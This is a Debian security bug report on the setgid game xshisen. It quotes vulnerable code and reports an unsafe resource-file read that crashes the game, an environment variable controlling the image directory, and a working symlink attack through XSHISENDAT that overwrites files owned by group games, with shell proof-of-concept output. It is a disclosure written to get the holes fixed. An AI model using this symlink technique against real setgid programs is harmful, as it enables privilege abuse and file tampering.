Package: xshisen Version: 1.51-1-1.1 Severity: grave Tags: security I've noticed a few more interesting things in xsheisen that might let it be exploited to get gid games and similar fun. I haven't exploited all of these and I don't know if they all really _are_ exploitable. This is just the result of a little 10 minute audit I did to get some idea of whether xshisen is likely to have more unfixed security holes besides the most recent set of three.
1. Unsafe resource file reading.
rcfile = new char [strlen(home) + 12];
sprintf(rcfile, "%s/.xshisenrc", home);
rdb2 = XrmGetFileDatabase(rcfile);
Here it loads up ~/..xshisenrc using XrmGetFileDatabase. Since this file
is in the user's home directory, it can be replaced by the user with
arbitrary content. According to the man page for XrmGetFileDatabase,
"the database that results from reading a file with incorrect syntax is
implementation- dependent." Since this function's behavior on corrupted
resource files is undefined, it seems likely that one might be able to
at least crash xsheisen with such a file, and possibly run shellcode.
Partial proof of concept:
[EMAIL PROTECTED]:~>cp =ls .xshisen
[EMAIL PROTECTED]:~>xshisen
Warning: Missing charsets in String to FontSet conversion
zsh: segmentation fault xshisen
Whether this is truely exploitable, I don't know.
2. Unsafe XSHISENLIB environment variable.
if ((lib_directory = getenv("XSHISENLIB")) == NULL)
lib_directory = globRes.libDir;
Here it lets an envionment variable control the lib directory that
xpm files are read from. These files are read by XpmReadFileToPixmap.
I don't know if that library function can be exploited by broken xpm
files, but any bug in it has the potential to be exploited via xshisen.
3. Unsafe XSHISENDAT environment variable.
if ((dat_directory = getenv("XSHISENDAT")) == NULL)
dat_directory = debscoredir;
Here it lets an envionment variable control the directory it uses to write
the global high score file. So you just point a symlink to a file you'd
like to overwrite and redirect the XSHISENDAT to that directory:
[EMAIL PROTECTED]:~>echo hi > file
[EMAIL PROTECTED]:~>ls -l xshisen.scores
lrwxrwxrwx 1 joey joey 4 Jan 24 16:05 xshisen.scores -> file
[EMAIL PROTECTED]:~>XSHISENDAT=. xshisen
Warning: Missing charsets in String to FontSet conversion
[here I finished a game in click trial mode]
[EMAIL PROTECTED]:~>head file
hi
joey (Joey Hess) X1.51 00:01:45 05-01-24 16:07:40
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
Like bug #291613 this symlink attack allows (over)writing files owned by
group games.
There's also the possiility of providing a xshisen.scores file
that overflows a buffer or something in the code that reads the high score
file. I don't see any overflows in that code offhand, but I didn't look very
hard.
My gut feeling after this little audit is that xshisen is not written
securely and should not be made setgid on a modern unix system. The
easiest fix seems to me to be removong the global high score file and
removing the sgid bit.
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.4.27
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Versions of packages xshisen depends on:
ii libc6 2.3.2.ds1-20 GNU C Library: Shared libraries an
ii libgcc1 1:3.4.3-7 GCC support library
ii libice6 4.3.0.dfsg.1-10 Inter-Client Exchange library
ii libsm6 4.3.0.dfsg.1-10 X Window System Session Management
ii libstdc++5 1:3.3.5-6 The GNU Standard C++ Library v3
ii libx11-6 4.3.0.dfsg.1-10 X Window System protocol client li
ii libxaw7 4.3.0.dfsg.1-10 X Athena widget set library
ii libxmu6 4.3.0.dfsg.1-10 X Window System miscellaneous util
ii libxpm4 4.3.0.dfsg.1-10 X pixmap library
ii libxt6 4.3.0.dfsg.1-10 X Toolkit Intrinsics
ii xlibs 4.3.0.dfsg.1-10 X Keyboard Extension (XKB) configu
-- no debconf information
--
see shy jo
signature.asc
Description: Digital signature
